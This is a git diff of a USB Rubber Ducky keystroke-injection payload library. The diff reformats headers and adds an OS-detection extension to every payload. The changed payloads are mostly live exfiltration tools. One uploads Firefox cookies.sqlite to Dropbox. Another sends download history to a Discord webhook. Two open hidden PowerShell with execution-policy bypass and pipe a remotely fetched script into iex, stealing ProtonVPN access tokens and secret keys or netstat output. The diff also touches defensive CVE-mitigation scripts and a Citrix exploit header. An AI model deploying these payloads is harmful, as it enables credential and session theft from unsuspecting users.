+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
DELAY 2000
-
REM Get cookies DB path
STRINGLN
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
@@ -33,14 +71,8 @@ STRINGLN
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-END_STRINGLN
+ $accessToken = #DROPBOX_ACCESS_TOKEN
-REM Setting about exfiltration
-STRING $accessToken =
-STRING DROPBOX_ACCESS_TOKEN
-ENTER
-
-STRINGLN
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
diff --git a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
index 0f88392..62b6d05 100644
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@@ -1,26 +1,68 @@
-REM ####################################################################
-REM # |
-REM # Title : Export all saved certificates with Adobe Reader |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################################
-
+REM_BLOCK
+####################################################################
+# #
+# Title : Export all saved certificates with Adobe Reader #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+####################################################################
+END_REM
REM Requirements:
REM - Adobe Reader must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 1000
-STRING PowerShell
+STRINGLN PowerShell
DELAY 2000
REM Settings about Adobe Reader
diff --git a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
index c8a8bcd..517cd70 100644
--- a/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
+++ b/payloads/library/exfiltration/Exports_all_the_links_of_the_downloads/payload.txt
@@ -1,20 +1,63 @@
-REM ###########################################################
-REM # |
-REM # Title : Exports all the links of the downloads |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################
-
+REM_BLOCK
+###########################################################
+# #
+# Title : Exports all the links of the downloads #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10/11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Firefox installed
-
REM You must define your Discord webhook if you want to use this method for the exfiltration
-DEFINE DISCORD_WEBHOOK example
+DEFINE #DISCORD_WEBHOOK example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Firefox
GUI
@@ -49,9 +92,7 @@ DELAY 10000
STRINGLN "
REM Exfiltration using Discord Webhook
-STRING $WebhookUrl = "
-STRING DISCORD_WEBHOOK
-STRINGLN "
+STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
diff --git a/payloads/library/exfiltration/ProtonVPN-config/payload.txt b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
index 796d694..aa1f6d9 100644
--- a/payloads/library/exfiltration/ProtonVPN-config/payload.txt
+++ b/payloads/library/exfiltration/ProtonVPN-config/payload.txt
@@ -1,43 +1,83 @@
-REM ###################################################################
-REM # |
-REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Credentials, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
+REM_BLOCK
+###################################################################
+# #
+# Title : ProtonVPN-config-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Credentials, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
-REM Title: ProtonVPN-config-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM In the config file you can find a lot information about the user like:
-REM - UserUid
-REM - UserAccessToken
-REM - UserRefreshToken
-REM - UserAuthenticationPublicKey
-REM - UserAuthenticationSecretKey
-REM - UserAuthenticationCertificatePem
-REM - UserCertificationServerPublicKey
-REM - and so on...
-REM Then it cleans up traces of what you have done after.
-REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
-REM Version: 1.0
-REM Category: Credentials, Exfiltration
-REM Requirements: ProtonVPN user logged at least one time and internet connection
-REM
+Title: ProtonVPN-config-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+ In the config file you can find a lot information about the user like:
+ - UserUid
+ - UserAccessToken
+ - UserRefreshToken
+ - UserAuthenticationPublicKey
+ - UserAuthenticationSecretKey
+ - UserAuthenticationCertificatePem
+ - UserCertificationServerPublicKey
+ - and so on...
+ Then it cleans up traces of what you have done after.
+Target: Windows 10-11 (PowerShell + ProtonVPN software)
+Version: 1.0
+Category: Credentials, Exfiltration
+Requirements: ProtonVPN user logged at least one time and internet connection
+END_REM
+
+REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
+DEFINE #PAYLOAD example.com
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks//
-DEFINE WEBHOOK example.com
+DEFINE #WEBHOOK example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-STRING WEBHOOK
-
-REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
-DEFINE PAYLOAD example.com
-STRING ';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
index 955e368..5a813a2 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/README.md
@@ -41,18 +41,12 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
Github
-
-
-
-
-
Instagram
- |
-
Discord
+
Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
index 452d120..0f67474 100644
--- a/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
+++ b/payloads/library/exfiltration/Tree_structure_of_the_operating_system/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################################
-REM # |
-REM # Title : Tree Structure Of The Operating System |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################################
+REM_BLOCK
+###########################################################
+# #
+# Title : Tree Structure Of The Operating System #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+###########################################################
+END_REM
REM Requirements:
REM - Internet connection
diff --git a/payloads/library/exfiltration/Windows-netstat/payload.txt b/payloads/library/exfiltration/Windows-netstat/payload.txt
index 8728395..c2133e3 100644
--- a/payloads/library/exfiltration/Windows-netstat/payload.txt
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
@@ -1,45 +1,84 @@
-REM ###################################################################
-REM # |
-REM # Title : Windows-netstat-to-Discord-Exfiltration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Net, Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###################################################################
+REM_BLOCK
+###################################################################
+# #
+# Title : Windows-netstat-to-Discord-Exfiltration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Net, Exfiltration #
+# Target : Windows 10-11 #
+# #
+###################################################################
-REM Title: Windows-netstat-to-Discord-Exfiltration
-REM Author: Aleff
-REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
-REM Put 1 on the function that you want to active, else 0. Functions available:
-REM - default (simple 'netstat' command)
-REM - routing_table $r
-REM - listening_canonical $lc
-REM - listening_numerical $ln
-REM - all_canonical $ac
-REM - all_numerical $an
-REM - offload ot
-REM - proto $p ""
-REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+Title: Windows-netstat-to-Discord-Exfiltration
+Author: Aleff
+Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+Put 1 on the function that you want to active, else 0. Functions available:
+- default (simple 'netstat' command)
+- routing_table $r
+- listening_canonical $lc
+- listening_numerical $ln
+- all_canonical $ac
+- all_numerical $an
+- offload ot
+- proto $p ""
+- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
-REM Target: Windows 10-11 (PowerShell)
-REM Version: 1.0
-REM Category: Net, Exfiltration
-REM Requirements: Internet connection
-REM
+Target: Windows 10-11 (PowerShell)
+Version: 1.0
+Category: Net, Exfiltration
+Requirements: Internet connection
+END_REM
REM REQUIRED - Provide your Discord WEBHOOK
-DEFINE WEBHOOK https://discordapp.com/api/webhooks//
+DEFINE #WEBHOOK https://discordapp.com/api/webhooks//
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE #PAYLOAD example.com
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass $discord='
-
-STRING WEBHOOK
-
-REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
-DEFINE PAYLOAD example.com
-STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
-ENTER
+STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
diff --git a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
index 2f38763..e86dc01 100644
--- a/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
+++ b/payloads/library/incident_response/Auto-Check_Cisco_IOS_XE_Backdoor_based_on_CVE-2023-20198_and_CVE-2023-20273/payload.txt
@@ -1,13 +1,14 @@
-REM #############################################################################################
-REM # #
-REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Cisco IOS XE #
-REM # #
-REM #############################################################################################
-
+REM_BLOCK
+#############################################################################################
+# #
+# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Cisco IOS XE #
+# #
+#############################################################################################
+END_REM
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
DEFINE #SCRIPT-NAME auto-check.sh
@@ -75,17 +76,17 @@ STRINGLN
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
END_STRINGLN
-
-
REM To avoid some bad DELAY I decided to use only one command row
-REM Old script
-REM STRINGLN sudo chmod +x #SCRIPT-NAME
-REM DELAY 500
-REM STRINGLN #SUDO-PSWD
-REM DELAY 3000
-REM STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
-REM STRINGLN exit
+REM_BLOCK
+Old script:
+ STRINGLN sudo chmod +x #SCRIPT-NAME
+ DELAY 500
+ STRINGLN #SUDO-PSWD
+ DELAY 3000
+ STRINGLN sh #PATH-TO-SCRIPT#SCRIPT-NAME $
+ STRINGLN exit
+END_REM
REM Optimized script
STRINGLN sudo chmod +x #SCRIPT-NAME; sh #PATH-TO-SCRIPT#SCRIPT-NAME $; exit
diff --git a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
index 9bb09a8..0cb57d1 100644
--- a/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_against_CVE-2023-36884_Office_and_Windows_HTML_R/payload.txt
@@ -1,34 +1,79 @@
-REM #######################################################################################################################
-REM # |
-REM # Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM #######################################################################################################################
+REM_BLOCK
+#######################################################################################################################
+# #
+# Title : Defend yourself against CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident Response #
+# Target : Windows 10/11 #
+# #
+#######################################################################################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
+Requirements:
+ - ExecutionPolicy Bypass
-REM Impact: Remote Code Execution
-REM Max Severity: Important
+Impact: Remote Code Execution
+Max Severity: Important
-REM Mitigation:
+Mitigation:
-REM - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
+ - Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
-REM - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
+ - The registry key FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION is located in the Main folder under the Internet Explorer settings, within the path HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\FeatureControl. This registry key is used to mitigate the vulnerability known as "Office and Windows HTML Remote Code Execution Vulnerability" (CVE-2023-36884).
-REM The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
+The CVE-2023-36884 vulnerability allows remote code execution through the processing of HTML files by Office and Windows applications. Creating this registry key and adding specific application values, such as REG_DWORD with data 1, helps block cross-protocol file navigation to mitigate the exploitation of this vulnerability.
-REM It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
+It is recommended to implement these protective measures to prevent potential attacks that could exploit the vulnerability and compromise the security of Office and Windows systems. It is important to understand the implications of modifying the registry and carefully evaluate the impact on the regular functionality of the involved applications.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
+END_REM
+
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
index 8e9ae56..7c6ec5a 100644
--- a/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
+++ b/payloads/library/incident_response/Defend_yourself_from_CVE-2023-23397/payload.txt
@@ -1,25 +1,27 @@
-REM ########################################################
-REM # |
-REM # Title : Defend Yourself From CVE-2023-23397 |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Incident-Response |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
+REM_BLOCK
+########################################################
+# #
+# Title : Defend Yourself From CVE-2023-23397 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Incident-Response #
+# Target : Windows 10/11 #
+# #
+########################################################
-REM PlugAndPlay <3
+PlugAndPlay <3
-REM Requirements:
-REM - ExecutionPolicy Bypass
-REM - PayloadStudio 1.3.1
+Requirements:
+ - ExecutionPolicy Bypass
+ - PayloadStudio 1.3.1
-REM Impacted Products:
-REM - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+Impacted Products:
+ - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
-REM Mitigation:
-REM - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
-REM Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+Mitigation:
+ - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
+ Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
index 8b2495e..5642176 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/payload.txt
@@ -1,12 +1,14 @@
-REM ################################################################################
-REM # #
-REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : incident-response #
-REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
-REM # #
-REM ################################################################################
+REM_BLOCK
+################################################################################
+# #
+# Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : incident-response #
+# Target : Citrix NetScaler ADV; NetScaler Gateway #
+# #
+################################################################################
+END_REM
REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
DEFINE #HOSTNAME example
diff --git a/payloads/library/prank/Alien Message From Computer/payload.txt b/payloads/library/prank/Alien Message From Computer/payload.txt
index ec205f0..5713691 100644
--- a/payloads/library/prank/Alien Message From Computer/payload.txt
+++ b/payloads/library/prank/Alien Message From Computer/payload.txt
@@ -1,39 +1,79 @@
+REM_BLOCK
+####################################################
+# #
+# Title : Alien Message From Computer #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################################
-REM ####################################################
-REM # |
-REM # Title : Alien Message From Computer |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################################
+Plug-And-Play <3
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Plug-And-Play <3
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
REM Create the file
-STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
+STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
